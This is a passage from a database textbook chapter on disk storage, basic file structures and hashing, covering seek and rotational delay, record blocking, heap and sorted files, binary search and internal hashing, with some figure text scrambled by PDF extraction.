transfer rates associ- ated with disks; they are also progressively getting cheaper—currently costing only a fraction of a dollar per megabyte of disk storage. Costs are going down so rapidly that costs as low 0.025 cent/MB—which translates to $0.25/GB and $250/TB—are already here. A disk is a random access addressable device. Transfer of data between main memory and disk takes place in units of disk blocks. The hardware address of a block—a combination of a cylinder number, track number (surface number within the cylin- der on which the track is located), and block number (within the track) is supplied to the disk I/O (input/output) hardware. In many modern disk drives, a single num- ber called LBA (Logical Block Address), which is a number between 0 and n (assum- ing the total capacity of the disk is n + 1 blocks), is mapped automatically to the right block by the disk drive controller. The address of a buffer—a contiguous 595 reserved area in main storage that holds one disk block—is also provided. For a read command, the disk block is copied into the buffer; whereas for a write com- mand, the contents of the buffer are copied into the disk block. Sometimes several contiguous blocks, called a cluster, may be transferred as a unit. In this case, the buffer size is adjusted to match the number of bytes in the cluster. The actual hardware mechanism that reads or writes a block is the disk read/write head, which is part of a system called a disk drive. A disk or disk pack is mounted in the disk drive, which includes a motor that rotates the disks. A read/write head includes an electronic component attached to a mechanical arm. Disk packs with multiple surfaces are controlled by several read/write heads—one for each surface, as shown in Figure 1(b). All arms are connected to an actuator attached to another electrical motor, which moves the read/write heads in unison and positions them precisely over the cylinder of tracks specified in a block address. Disk drives for hard disks rotate the disk pack continuously at a constant speed (typically ranging between 5,400 and 15,000 rpm). Once the read/write head is positioned on the right track and the block specified in the block address moves under the read/write head, the electronic component of the read/write head is acti- vated to transfer the data. Some disk units have fixed read/write heads, with as many heads as there are tracks. These are called fixed-head disks, whereas disk units with an actuator are called movable-head disks. For fixed-head disks, a track or cylinder is selected by electronically switching to the appropriate read/write head rather than by actual mechanical movement; consequently, it is much faster. However, the cost of the additional read/write heads is quite high, so fixed-head disks are not com- monly used. A disk controller, typically embedded in the disk drive, controls the disk drive and interfaces it to the computer system. One of the standard interfaces used today for disk drives on PCs and workstations is called SCSI (Small Computer System Interface). The controller accepts high-level I/O commands and takes appropriate action to position the arm and causes the read/write action to take place. To transfer a disk block, given its address, the disk controller must first mechanically position the read/write head on the correct track. The time required to do this is called the seek time. Typical seek times are 5 to 10 msec on desktops and 3 to 8 msecs on servers. Following that, there is another delay—called the rotational delay or latency—while the beginning of the desired block rotates into position under the read/write head. It depends on the rpm of the disk. For example, at 15,000 rpm, the time per rotation is 4 msec and the average rotational delay is the time per half rev- olution, or 2 msec. At 10,000 rpm the average rotational delay increases to 3 msec. Finally, some additional time is needed to transfer the data; this is called the block transfer time. Hence, the total time needed to locate and transfer an arbitrary block, given its address, is the sum of the seek time, rotational delay, and block transfer time. The seek time and rotational delay are usually much larger than the block transfer time. To make the transfer of multiple blocks more efficient, it is common to transfer several consecutive blocks on the same track or cylinder. This eliminates the seek time and rotational delay for all but the first block and can result Disk Storage, Basic File Structures, and Hashing 596 Disk Storage, Basic File Structures, and Hashing in a substantial saving of time when numerous contiguous blocks are transferred. Usually, the disk manufacturer provides a bulk transfer rate for calculating the time required to transfer consecutive blocks. The time needed to locate and transfer a disk block is in the order of milliseconds, usually ranging from 9 to 60 msec. For contiguous blocks, locating the first block takes from 9 to 60 msec, but transferring subsequent blocks may take only 0.4 to 2 msec each. Many search techniques take advantage of consecutive retrieval of blocks when searching for data on disk. In any case, a transfer time in the order of millisec- onds is considered quite high compared with the time required to process data in main memory by current CPUs. Hence, locating data on disk is a major bottleneck in database applications. The file structures we discuss here attempt to minimize the number of block transfers needed to locate and transfer the required data from disk to main memory. Placing “related information” on contiguous blocks is the basic goal of any storage organization on disk. 2.2 Magnetic Tape Storage Devices Disks are random access secondary storage devices because an arbitrary disk block may be accessed at random once we specify its address. Magnetic tapes are sequen- tial access devices; to access the nth block on tape, first we must scan the preceding n – 1 blocks. Data is stored on reels of high-capacity magnetic tape, somewhat sim- ilar to audiotapes or videotapes. A tape drive is required to read the data from or write the data to a tape reel. Usually, each group of bits that forms a byte is stored across the tape, and the bytes themselves are stored consecutively on the tape. A read/write head is used to read or write data on tape. Data records on tape are also stored in blocks—although the blocks may be substantially larger than those for disks, and interblock gaps are also quite large. With typical tape densities of 1600 to 6250 bytes per inch, a typical interblock gap4 of 0.6 inch corresponds to 960 to 3750 bytes of wasted storage space. It is customary to group many records together in one block for better space utilization. The main characteristic of a tape is its requirement that we access the data blocks in sequential order. To get to a block in the middle of a reel of tape, the tape is mounted and then scanned until the required block gets under the read/write head. For this reason, tape access can be slow and tapes are not used to store online data, except for some specialized applications. However, tapes serve a very important function—backing up the database. One reason for backup is to keep copies of disk files in case the data is lost due to a disk crash, which can happen if the disk read/write head touches the disk surface because of mechanical malfunction. For this reason, disk files are copied periodically to tape. For many online critical appli- cations, such as airline reservation systems, to avoid any downtime, mirrored sys- tems are used to keep three sets of identical disks—two in online operation and one 4Called interrecord gaps in tape terminology. 597 Disk Storage, Basic File Structures, and Hashing as backup. Here, offline disks become a backup device. The three are rotated so that they can be switched in case there is a failure on one of the live disk drives. Tapes can also be used to store excessively large database files. Database files that are seldom used or are outdated but required for historical record keeping can be archived on tape. Originally, half-inch reel tape drives were used for data storage employing the so-called 9 track tapes. Later, smaller 8-mm magnetic tapes (similar to those used in camcorders) that can store up to 50 GB, as well as 4-mm helical scan data cartridges and writable CDs and DVDs, became popular media for backing up data files from PCs and workstations. They are also used for storing images and system libraries. Backing up enterprise databases so that no transaction information is lost is a major undertaking. Currently, tape libraries with slots for several hundred cartridges are used with Digital and Superdigital Linear Tapes (DLTs and SDLTs) having capacities in hundreds of gigabytes that record data on linear tracks. Robotic arms are used to write on multiple cartridges in parallel using multiple tape drives with automatic labeling software to identify the backup cartridges. An example of a giant library is the SL8500 model of Sun Storage Technology that can store up to 70 petabytes (petabyte = 1000 TB) of data using up to 448 drives with a maximum throughput rate of 193.2 TB/hour. We defer the discussion of disk storage technology called RAID, and of storage area networks, network-attached storage, and iSCSI storage systems to the end of the chapter. 3 Buffering of Blocks When several blocks need to be transferred from disk to main memory and all the block addresses are known, several buffers can be reserved in main memory to speed up the transfer. While one buffer is being read or written, the CPU can process data in the other buffer because an independent disk I/O processor (con- troller) exists that, once started, can proceed to transfer a data block between mem- ory and disk independent of and in parallel to CPU processing. Figure 3 illustrates how two processes can proceed in parallel. Processes A and B are running concurrently in an interleaved fashion, whereas processes C and D are running concurrently in a parallel fashion. When a single CPU controls multiple processes, parallel execution is not possible. However, the processes can still run concurrently in an interleaved way. Buffering is most useful when processes can run concurrently in a parallel fashion, either because a separate disk I/O processor is available or because multiple CPU processors exist. Figure 4 illustrates how reading and processing can proceed in parallel when the time required to process a disk block in memory is less than the time required to read the next block and fill a buffer. The CPU can start processing a block once its transfer to main memory is completed; at the same time, the disk I/O processor can be reading and transferring the next block into a different buffer. This technique is called double buffering and can also be used to read a continuous stream of blocks from disk to memory. Double buffering permits continuous reading or writing of data on consecutive disk blocks, which eliminates the seek time and rotational delay 598 Disk Storage, Basic File Structures, and Hashing Interleaved concurrency of operations A and B Parallel execution of operations C and D t1 A A B B t2 t3 t4 Time Figure 3 Interleaved concurrency versus parallel execution. i + 1 Process B i + 2 Fill A Time i Process A i + 1 Fill B Disk Block: I/O: Disk Block: PROCESSING: i Fill A i + 2 Process A i + 3 Fill A i + 4 Process A i + 3 Process B i + 4 Fill A Figure 4 Use of two buffers, A and B, for reading from disk. for all but the first block transfer. Moreover, data is kept ready for processing, thus reducing the waiting time in the programs. 4 Placing File Records on Disk In this section, we define the concepts of records, record types, and files. Then we discuss techniques for placing file records on disk. 4.1 Records and Record Types Data is usually stored in the form of records. Each record consists of a collection of related data values or items, where each value is formed of one or more bytes and corresponds to a particular field of the record. Records usually describe entities and their attributes. For example, an EMPLOYEE record represents an employee entity, and each field value in the record specifies some attribute of that employee, such as Name, Birth_date, Salary, or Supervisor. A collection of field names and their corre- 599 Disk Storage, Basic File Structures, and Hashing sponding data types constitutes a record type or record format definition. A data type, associated with each field, specifies the types of values a field can take. The data type of a field is usually one of the standard data types used in program- ming. These include numeric (integer, long integer, or floating point), string of characters (fixed-length or varying), Boolean (having 0 and 1 or TRUE and FALSE values only), and sometimes specially coded date and time data types. The number of bytes required for each data type is fixed for a given computer system. An integer may require 4 bytes, a long integer 8 bytes, a real number 4 bytes, a Boolean 1 byte, a date 10 bytes (assuming a format of YYYY-MM-DD), and a fixed-length string of k characters k bytes. Variable-length strings may require as many bytes as there are characters in each field value. For example, an EMPLOYEE record type may be defined—using the C programming language notation—as the following structure: struct employee{ char name[30]; char ssn[9]; int salary; int job_code; char department[20]; } ; In some database applications, the need may arise for storing data items that consist of large unstructured objects, which represent images, digitized video or audio streams, or free text. These are referred to as BLOBs (binary large objects). A BLOB data item is typically stored separately from its record in a pool of disk blocks, and a pointer to the BLOB is included in the record. 4.2 Files, Fixed-Length Records, and Variable-Length Records A file is a sequence of records. In many cases, all records in a file are of the same record type. If every record in the file has exactly the same size (in bytes), the file is said to be made up of fixed-length records. If different records in the file have dif- ferent sizes, the file is said to be made up of variable-length records. A file may have variable-length records for several reasons: ■ The file records are of the same record type, but one or more of the fields are of varying size (variable-length fields). For example, the Name field of EMPLOYEE can be a variable-length field. ■ The file records are of the same record type, but one or more of the fields may have multiple values for individual records; such a field is called a repeating field and a group of values for the field is often called a repeating group. ■ The file records are of the same record type, but one or more of the fields are optional; that is, they may have values for some but not all of the file records (optional fields). 600 Name = Smith, John Ssn = 123456789 DEPARTMENT = Computer Smith, John Name 1 (a) (b) (c) 1 12 21 25 29 Name Ssn Salary Job_code Department Hire_date 31 40 44 48 68 Ssn Salary Job_code Department Separator Characters123456789 XXXX XXXX Computer Separator Characters Separates field name from field value Separates fields Terminates record = Disk Storage, Basic File Structures, and Hashing Figure 5 Three record storage formats. (a) A fixed-length record with six fields and size of 71 bytes. (b) A record with two variable-length fields and three fixed-length fields. (c) A variable-field record with three types of separator characters. ■ The file contains records of different record types and hence of varying size (mixed file). This would occur if related records of different types were clustered (placed together) on disk blocks; for example, the GRADE_REPORT records of a particular student may be placed following that STUDENT’s record. The fixed-length EMPLOYEE records in Figure 5(a) have a record size of 71 bytes. Every record has the same fields, and field lengths are fixed, so the system can iden- tify the starting byte position of each field relative to the starting position of the record. This facilitates locating field values by programs that access such files. Notice that it is possible to represent a file that logically should have variable-length records as a fixed-length records file. For example, in the case of optional fields, we could have every field included in every file record but store a special NULL value if no value exists for that field. For a repeating field, we could allocate as many spaces in each record as the maximum possible number of occurrences of the field. In either case, space is wasted when certain records do not have values for all the physical spaces provided in each record. Now we consider other options for formatting records of a file of variable-length records. 601 Disk Storage, Basic File Structures, and Hashing For variable-length fields, each record has a value for each field, but we do not know the exact length of some field values. To determine the bytes within a particular record that represent each field, we can use special separator characters (such as ? or % or $)—which do not appear in any field value—to terminate variable-length fields, as shown in Figure 5(b), or we can store the length in bytes of the field in the record, preceding the field value. A file of records with optional fields can be formatted in different ways. If the total number of fields for the record type is large, but the number of fields that actually appear in a typical record is small, we can include in each record a sequence of pairs rather than just the field values. Three types of sep-
arator characters are used in Figure 5(c), although we could use the same separator
character for the first two purposes—separating the field name from the field value
and separating one field from the next field. A more practical option is to assign a
short field type code—say, an integer number—to each field and include in each
record a sequence of pairs rather than pairs.

A repeating field needs one separator character to separate the repeating values of
the field and another separator character to indicate termination of the field.
Finally, for a file that includes records of different types, each record is preceded by a
record type indicator. Understandably, programs that process files of variable-
length records—which are usually part of the file system and hence hidden from the
typical programmers—need to be more complex than those for fixed-length
records, where the starting position and size of each field are known and fixed.5

4.3 Record Blocking and Spanned
versus Unspanned Records

The records of a file must be allocated to disk blocks because a block is the unit of
data transfer between disk and memory. When the block size is larger than the
record size, each block will contain numerous records, although some files may have
unusually large records that cannot fit in one block. Suppose that the block size is B
bytes. For a file of fixed-length records of size R bytes, with B ≥ R, we can fit bfr =
⎣B/R⎦ records per block, where the ⎣(x)⎦ (floor function) rounds down the number x
to an integer. The value bfr is called the blocking factor for the file. In general, R
may not divide B exactly, so we have some unused space in each block equal to

B − (bfr * R) bytes
To utilize this unused space, we can store part of a record on one block and the rest
on another. A pointer at the end of the first block points to the block containing the
remainder of the record in case it is not the next consecutive block on disk. This
organization is called spanned because records can span more than one block.
Whenever a record is larger than a block, we must use a spanned organization. If
records are not allowed to cross block boundaries, the organization is called
unspanned. This is used with fixed-length records having B > R because it makes

5Other schemes are also possible for representing variable-length records.

602

Disk Storage, Basic File Structures, and Hashing

Record 1Block i Record 2 Record 3 Record 4 P

Record 4 (rest)Block i + 1 Record 5 Record 6 Record 7 P

Record 1Block i

(b)

(a) Record 2 Record 3

Record 4Block i + 1 Record 5 Record 6

Figure 6
Types of record
organization.
(a) Unspanned.
(b) Spanned.

each record start at a known location in the block, simplifying record processing. For
variable-length records, either a spanned or an unspanned organization can be used.
If the average record is large, it is advantageous to use spanning to reduce the lost
space in each block. Figure 6 illustrates spanned versus unspanned organization.

For variable-length records using spanned organization, each block may store a dif-
ferent number of records. In this case, the blocking factor bfr represents the average
number of records per block for the file. We can use bfr to calculate the number of
blocks b needed for a file of r records:

b = ⎡(r/bfr)⎤ blocks
where the ⎡(x)⎤ (ceiling function) rounds the value x up to the next integer.

4.4 Allocating File Blocks on Disk
There are several standard techniques for allocating the blocks of a file on disk. In
contiguous allocation, the file blocks are allocated to consecutive disk blocks. This
makes reading the whole file very fast using double buffering, but it makes expand-
ing the file difficult. In linked allocation, each file block contains a pointer to the
next file block. This makes it easy to expand the file but makes it slow to read the
whole file. A combination of the two allocates clusters of consecutive disk blocks,
and the clusters are linked. Clusters are sometimes called file segments or extents.
Another possibility is to use indexed allocation, where one or more index blocks
contain pointers to the actual file blocks. It is also common to use combinations of
these techniques.

4.5 File Headers
A file header or file descriptor contains information about a file that is needed by
the system programs that access the file records. The header includes information to
determine the disk addresses of the file blocks as well as to record format descrip-
tions, which may include field lengths and the order of fields within a record for
fixed-length unspanned records and field type codes, separator characters, and
record type codes for variable-length records.

To search for a record on disk, one or more blocks are copied into main memory
buffers. Programs then search for the desired record or records within the buffers,
using the information in the file header. If the address of the block that contains the
desired record is not known, the search programs must do a linear search through

603

Disk Storage, Basic File Structures, and Hashing

the file blocks. Each file block is copied into a buffer and searched until the record is
located or all the file blocks have been searched unsuccessfully. This can be very
time-consuming for a large file. The goal of a good file organization is to locate the
block that contains a desired record with a minimal number of block transfers.

5 Operations on Files
Operations on files are usually grouped into retrieval operations and update oper-
ations. The former do not change any data in the file, but only locate certain records
so that their field values can be examined and processed. The latter change the file
by insertion or deletion of records or by modification of field values. In either case,
we may have to select one or more records for retrieval, deletion, or modification
based on a selection condition (or filtering condition), which specifies criteria that
the desired record or records must satisfy.

Consider an EMPLOYEE file with fields Name, Ssn, Salary, Job_code, and Department.
A simple selection condition may involve an equality comparison on some field
value—for example, (Ssn = ‘123456789’) or (Department = ‘Research’). More com-
plex conditions can involve other types of comparison operators, such as > or ≥; an
example is (Salary ≥ 30000). The general case is to have an arbitrary Boolean expres-
sion on the fields of the file as the selection condition.

Search operations on files are generally based on simple selection conditions. A
complex condition must be decomposed by the DBMS (or the programmer) to
extract a simple condition that can be used to locate the records on disk. Each
located record is then checked to determine whether it satisfies the full selection
condition. For example, we may extract the simple condition (Department =
‘Research’) from the complex condition ((Salary ≥ 30000) AND (Department =
‘Research’)); each record satisfying (Department = ‘Research’) is located and then
tested to see if it also satisfies (Salary ≥ 30000).

When several file records satisfy a search condition, the first record—with respect to
the physical sequence of file records—is initially located and designated the current
record. Subsequent search operations commence from this record and locate the
next record in the file that satisfies the condition.

Actual operations for locating and accessing file records vary from system to system.
Below, we present a set of representative operations. Typically, high-level programs,
such as DBMS software programs, access records by using these commands, so we
sometimes refer to program variables in the following descriptions:

■ Open. Prepares the file for reading or writing. Allocates appropriate buffers
(typically at least two) to hold file blocks from disk, and retrieves the file
header. Sets the file pointer to the beginning of the file.

■ Reset. Sets the file pointer of an open file to the beginning of the file.
■ Find (or Locate). Searches for the first record that satisfies a search condi-

tion. Transfers the block containing that record into a main memory buffer
(if it is not already there). The file pointer points to the record in the buffer

604

Disk Storage, Basic File Structures, and Hashing

and it becomes the current record. Sometimes, different verbs are used to
indicate whether the located record is to be retrieved or updated.

■ Read (or Get). Copies the current record from the buffer to a program vari-
able in the user program. This command may also advance the current
record pointer to the next record in the file, which may necessitate reading
the next file block from disk.

■ FindNext. Searches for the next record in the file that satisfies the search
condition. Transfers the block containing that record into a main memory
buffer (if it is not already there). The record is located in the buffer and
becomes the current record. Various forms of FindNext (for example, Find
Next record within a current parent record, Find Next record of a given type,
or Find Next record where a complex condition is met) are available in
legacy DBMSs based on the hierarchical and network models.

■ Delete. Deletes the current record and (eventually) updates the file on disk
to reflect the deletion.

■ Modify. Modifies some field values for the current record and (eventually)
updates the file on disk to reflect the modification.

■ Insert. Inserts a new record in the file by locating the block where the record
is to be inserted, transferring that block into a main memory buffer (if it is
not already there), writing the record into the buffer, and (eventually) writ-
ing the buffer to disk to reflect the insertion.

■ Close. Completes the file access by releasing the buffers and performing any
other needed cleanup operations.

The preceding (except for Open and Close) are called record-at-a-time operations
because each operation applies to a single record. It is possible to streamline the
operations Find, FindNext, and Read into a single operation, Scan, whose descrip-
tion is as follows:

■ Scan. If the file has just been opened or reset, Scan returns the first record;
otherwise it returns the next record. If a condition is specified with the oper-
ation, the returned record is the first or next record satisfying the condition.

In database systems, additional set-at-a-time higher-level operations may be
applied to a file. Examples of these are as follows:

■ FindAll. Locates all the records in the file that satisfy a search condition.
■ Find (or Locate) n. Searches for the first record that satisfies a search condi-

tion and then continues to locate the next n – 1 records satisfying the same
condition. Transfers the blocks containing the n records to the main memory
buffer (if not already there).

■ FindOrdered. Retrieves all the records in the file in some specified order.
■ Reorganize. Starts the reorganization process. As we shall see, some file

organizations require periodic reorganization. An example is to reorder the
file records by sorting them on a specified field.

605

Disk Storage, Basic File Structures, and Hashing

At this point, it is worthwhile to note the difference between the terms file organiza-
tion and access method. A file organization refers to the organization of the data of
a file into records, blocks, and access structures; this includes the way records and
blocks are placed on the storage medium and interlinked. An access method, on the
other hand, provides a group of operations—such as those listed earlier—that can
be applied to a file. In general, it is possible to apply several access methods to a file
organization. Some access methods, though, can be applied only to files organized
in certain ways. For example, we cannot apply an indexed access method to a file
without an index.

Usually, we expect to use some search conditions more than others. Some files may
be static, meaning that update operations are rarely performed; other, more
dynamic files may change frequently, so update operations are constantly applied to
them. A successful file organization should perform as efficiently as possible the
operations we expect to apply frequently to the file. For example, consider the
EMPLOYEE file, as shown in Figure 5(a), which stores the records for current
employees in a company. We expect to insert records (when employees are hired),
delete records (when employees leave the company), and modify records (for exam-
ple, when an employee’s salary or job is changed). Deleting or modifying a record
requires a selection condition to identify a particular record or set of records.
Retrieving one or more records also requires a selection condition.

If users expect mainly to apply a search condition based on Ssn, the designer must
choose a file organization that facilitates locating a record given its Ssn value. This
may involve physically ordering the records by Ssn value or defining an index on
Ssn. Suppose that a second application uses the file to generate employees’ pay-
checks and requires that paychecks are grouped by department. For this application,
it is best to order employee records by department and then by name within each
department. The clustering of records into blocks and the organization of blocks on
cylinders would now be different than before. However, this arrangement conflicts
with ordering the records by Ssn values. If both applications are important, the
designer should choose an organization that allows both operations to be done effi-
ciently. Unfortunately, in many cases a single organization does not allow all needed
operations on a file to be implemented efficiently. This requires that a compromise
must be chosen that takes into account the expected importance and mix of
retrieval and update operations.

In the following sections, we discuss methods for organizing records of a file on
disk. Several general techniques, such as ordering, hashing, and indexing, are used
to create access methods. Additionally, various general techniques for handling
insertions and deletions work with many file organizations.

6 Files of Unordered Records (Heap Files)
In this simplest and most basic type of organization, records are placed in the file in
the order in which they are inserted, so new records are inserted at the end of the

606

Disk Storage, Basic File Structures, and Hashing

file. Such an organization is called a heap or pile file.6 This organization is often
used with additional access paths, such as secondary indexes. It is also used to collect
and store data records for future use.

Inserting a new record is very efficient. The last disk block of the file is copied into a
buffer, the new record is added, and the block is then rewritten back to disk. The
address of the last file block is kept in the file header. However, searching for a
record using any search condition involves a linear search through the file block by
block—an expensive procedure. If only one record satisfies the search condition,
then, on the average, a program will read into memory and search half the file
blocks before it finds the record. For a file of b blocks, this requires searching (b/2)
blocks, on average. If no records or several records satisfy the search condition, the
program must read and search all b blocks in the file.

To delete a record, a program must first find its block, copy the block into a buffer,
delete the record from the buffer, and finally rewrite the block back to the disk. This
leaves unused space in the disk block. Deleting a large number of records in this way
results in wasted storage space. Another technique used for record deletion is to
have an extra byte or bit, called a deletion marker, stored with each record. A record
is deleted by setting the deletion marker to a certain value. A different value for the
marker indicates a valid (not deleted) record. Search programs consider only valid
records in a block when conducting their search. Both of these deletion techniques
require periodic reorganization of the file to reclaim the unused space of deleted
records. During reorganization, the file blocks are accessed consecutively, and
records are packed by removing deleted records. After such a reorganization, the
blocks are filled to capacity once more. Another possibility is to use the space of
deleted records when inserting new records, although this requires extra bookkeep-
ing to keep track of empty locations.

We can use either spanned or unspanned organization for an unordered file, and it
may be used with either fixed-length or variable-length records. Modifying a vari-
able-length record may require deleting the old record and inserting a modified
record because the modified record may not fit in its old space on disk.

To read all records in order of the values of some field, we create a sorted copy of the
file. Sorting is an expensive operation for a large disk file, and special techniques for
external sorting are used.

For a file of unordered fixed-length records using unspanned blocks and contiguous
allocation, it is straightforward to access any record by its position in the file. If the
file records are numbered 0, 1, 2, …, r − 1 and the records in each block are num-
bered 0, 1, …, bfr − 1, where bfr is the blocking factor, then the ith record of the file
is located in block ⎣(i/bfr)⎦ and is the (i mod bfr)th record in that block. Such a file
is often called a relative or direct file because records can easily be accessed directly
by their relative positions. Accessing a record by its position does not help locate a
record based on a search condition; however, it facilitates the construction of access
paths on the file, such as indexes.

6Sometimes this organization is called a sequential file.

607

Disk Storage, Basic File Structures, and Hashing

7 Files of Ordered Records (Sorted Files)
We can physically order the records of a file on disk based on the values of one of
their fields—called the ordering field. This leads to an ordered or sequential file.7

If the ordering field is also a key field of the file—a field guaranteed to have a
unique value in each record—then the field is called the ordering key for the file.
Figure 7 shows an ordered file with Name as the ordering key field (assuming that
employees have distinct names).

Ordered records have some advantages over unordered files. First, reading the records
in order of the ordering key values becomes extremely efficient because no sorting is
required. Second, finding the next record from the current one in order of the order-
ing key usually requires no additional block accesses because the next record is in the
same block as the current one (unless the current record is the last one in the block).
Third, using a search condition based on the value of an ordering key field results in
faster access when the binary search technique is used, which constitutes an improve-
ment over linear searches, although it is not often used for disk files. Ordered files are
blocked and stored on contiguous cylinders to minimize the seek time.

A binary search for disk files can be done on the blocks rather than on the records.
Suppose that the file has b blocks numbered 1, 2, …, b; the records are ordered by
ascending value of their ordering key field; and we are searching for a record whose
ordering key field value is K. Assuming that disk addresses of the file blocks are avail-
able in the file header, the binary search can be described by Algorithm 1. A binary
search usually accesses log2(b) blocks, whether the record is found or not—an
improvement over linear searches, where, on the average, (b/2) blocks are accessed
when the record is found and b blocks are accessed when the record is not found.

Algorithm 1. Binary Search on an Ordering Key of a Disk File
l ← 1; u ← b; (* b is the number of file blocks *)
while (u ≥ l ) do

begin i ← (l + u) div 2;
read block i of the file into the buffer;
if K < (ordering key field value of the first record in block i ) then u ← i – 1 else if K > (ordering key field value of the last record in block i )

then l ← i + 1
else if the record with ordering key field value = K is in the buffer

then goto found
else goto notfound;
end;

goto notfound;

A search criterion involving the conditions >, <, ≥, and ≤ on the ordering field is quite efficient, since the physical ordering of records means that all records 7The term sequential file has also been used to refer to unordered files, although it is more appropriate for ordered files. 608 Name Aaron, Ed Abbott, Diane Block 1 Acosta, Marc Ssn Birth_date ... Job Salary Sex ... Adams, John Adams, Robin Block 2 Akers, Jan ... Alexander, Ed Alfred, Bob Block 3 Allen, Sam ... Allen, Troy Anders, Keith Block 4 Anderson, Rob ... Anderson, Zach Angeli, Joe Block 5 Archer, Sue ... Arnold, Mack Arnold, Steven Block 6 Atkins, Timothy Wong, James Wood, Donald Block n–1 Woods, Manny ... Wright, Pam Wyatt, Charles Block n Zimmer, Byron ... Figure 7 Some blocks of an ordered (sequential) file of EMPLOYEE records with Name as the ordering key field. Disk Storage, Basic File Structures, and Hashing satisfying the condition are contiguous in the file. For example, referring to Figure 7, if the search criterion is (Name < ‘G’)—where < means alphabetically before—the records satisfying the search criterion are those from the beginning of the file up to the first record that has a Name value starting with the letter ‘G’. 609 Ordering does not provide any advantages for random or ordered access of the records based on values of the other nonordering fields of the file. In these cases, we do a linear search for random access. To access the records in order based on a nonordering field, it is necessary to create another sorted copy—in a different order—of the file. Inserting and deleting records are expensive operations for an ordered file because the records must remain physically ordered. To insert a record, we must find its cor- rect position in the file, based on its ordering field value, and then make space in the file to insert the record in that position. For a large file this can be very time- consuming because, on the average, half the records of the file must be moved to make space for the new record. This means that half the file blocks must be read and rewritten after records are moved among them. For record deletion, the problem is less severe if deletion markers and periodic reorganization are used. One option for making insertion more efficient is to keep some unused space in each block for new records. However, once this space is used up, the original problem resurfaces. Another frequently used method is to create a temporary unordered file called an overflow or transaction file. With this technique, the actual ordered file is called the main or master file. New records are inserted at the end of the overflow file rather than in their correct position in the main file. Periodically, the overflow file is sorted and merged with the master file during file reorganization. Insertion becomes very efficient, but at the cost of increased complexity in the search algorithm. The overflow file must be searched using a linear search if, after the binary search, the record is not found in the main file. For applications that do not require the most up- to-date information, overflow records can be ignored during a search. Modifying a field value of a record depends on two factors: the search condition to locate the record and the field to be modified. If the search condition involves the ordering key field, we can locate the record using a binary search; otherwise we must do a linear search. A nonordering field can be modified by changing the record and rewriting it in the same physical location on disk—assuming fixed-length records. Modifying the ordering field means that the record can change its position in the file. This requires deletion of the old record followed by insertion of the modified record. Reading the file records in order of the ordering field is quite efficient if we ignore the records in overflow, since the blocks can be read consecutively using double buffering. To include the records in overflow, we must merge them in their correct positions; in this case, first we can reorganize the file, and then read its blocks sequentially. To reorganize the file, first we sort the records in the overflow file, and then merge them with the master file. The records marked for deletion are removed during the reorganization. Table 2 summarizes the average access time in block accesses to find a specific record in a file with b blocks. Ordered files are rarely used in database applications unless an additional access path, called a primary index, is used; this results in an indexed-sequential file. This Disk Storage, Basic File Structures, and Hashing 610 Disk Storage, Basic File Structures, and Hashing Table 2 Average Access Times for a File of b Blocks under Basic File Organizations Average Blocks to Access Type of Organization Access/Search Method a Specific Record Heap (unordered) Sequential scan (linear search) b/2 Ordered Sequential scan b/2 Ordered Binary search log2 b further improves the random access time on the ordering key field. If the ordering attribute is not a key, the file is called a clustered file. 8 Hashing Techniques Another type of primary file organization is based on hashing, which provides very fast access to records under certain search conditions. This organization is usually called a hash file.8 The search condition must be an equality condition on a single field, called the hash field. In most cases, the hash field is also a key field of the file, in which case it is called the hash key. The idea behind hashing is to provide a func- tion h, called a hash function or randomizing function, which is applied to the hash field value of a record and yields the address of the disk block in which the record is stored. A search for the record within the block can be carried out in a main memory buffer. For most records, we need only a single-block access to retrieve that record. Hashing is also used as an internal search structure within a program whenever a group of records is accessed exclusively by using the value of one field. We describe the use of hashing for internal files in Section 8.1; then we show how it is modified to store external files on disk in Section 8.2. In Section 8.3 we discuss techniques for extending hashing to dynamically growing files. 8.1 Internal Hashing For internal files, hashing is typically implemented as a hash table through the use of an array of records. Suppose that the array index range is from 0 to M – 1, as shown in Figure 8(a); then we have M slots whose addresses correspond to the array indexes. We choose a hash function that transforms the hash field value into an inte- ger between 0 and M − 1. One common hash function is the h(K) = K mod M func- tion, which returns the remainder of an integer hash field value K after division by M; this value is then used for the record address. 8A hash file has also been called a direct file. 611 Disk Storage, Basic File Structures, and Hashing Noninteger hash field values can be transformed into integers before the mod function is applied. For character strings, the numeric (ASCII) codes associated with characters can be used in the transformation—for example, by multiplying those code values. For a hash field whose data type is a string of 20 characters, Algorithm 2(a) can be used to calculate the hash address. We assume that the code function returns the numeric code of a character and that we are given a hash field value K of type K: array [1..20] of char (in Pascal) or char K[20] (in C). (a) –1 –1 –1 M + 2 M 0 1 2 3 M – 2 M – 1 Data fields Overflow pointer Address space Overflow space M + 1 M + 5 –1 M + 4 –1 M + 0 – 2 M + 0 – 1 null pointer = –1 overflow pointer refers to position of next record in linked list M – 2 M M + 1 M + 2 M – 1 Name Ssn Job Salary (b) 0 1 2 3 4 ... Figure 8 Internal hashing data structures. (a) Array of M positions for use in internal hashing. (b) Collision resolution by chaining records. 612 Disk Storage, Basic File Structures, and Hashing Algorithm 2. Two simple hashing algorithms: (a) Applying the mod hash function to a character string K. (b) Collision resolution by open addressing. (a) temp ← 1; for i ← 1 to 20 do temp ← temp * code(K[i ] ) mod M ; hash_address ← temp mod M; (b) i ← hash_address(K); a ← i; if location i is occupied then begin i ← (i + 1) mod M; while (i ≠ a) and location i is occupied do i ← (i + 1) mod M; if (i = a) then all positions are full else new_hash_address ← i; end; Other hashing functions can be used. One technique, called folding, involves apply- ing an arithmetic function such as addition or a logical function such as exclusive or to different portions of the hash field value to calculate the hash address (for exam- ple, with an address space from 0 to 999 to store 1,000 keys, a 6-digit key 235469 may be folded and stored at the address: (235+964) mod 1000 = 199). Another tech- nique involves picking some digits of the hash field value—for instance, the third, fifth, and eighth digits—to form the hash address (for example, storing 1,000 employees with Social Security numbers of 10 digits into a hash file with 1,000 posi- tions would give the Social Security number 301-67-8923 a hash value of 172 by this hash function).9 The problem with most hashing functions is that they do not guar- antee that distinct values will hash to distinct addresses, because the hash field space—the number of possible values a hash field can take—is usually much larger than the address space—the number of available addresses for records. The hashing function maps the hash field space to the address space. A collision occurs when the hash field value of a record that is being inserted hashes to an address that already contains a different record. In this situation, we must insert the new record in some other position, since its hash address is occupied. The process of finding another position is called collision resolution. There are numer- ous methods for collision resolution, including the following: ■ Open addressing. Proceeding from the occupied position specified by the hash address, the program checks the subsequent positions in order until an unused (empty) position is found. Algorithm 2(b) may be used for this pur- pose. ■ Chaining. For this method, various overflow locations are kept, usually by extending the array with a number of overflow positions. Additionally, a pointer field is added to each record location. A collision is 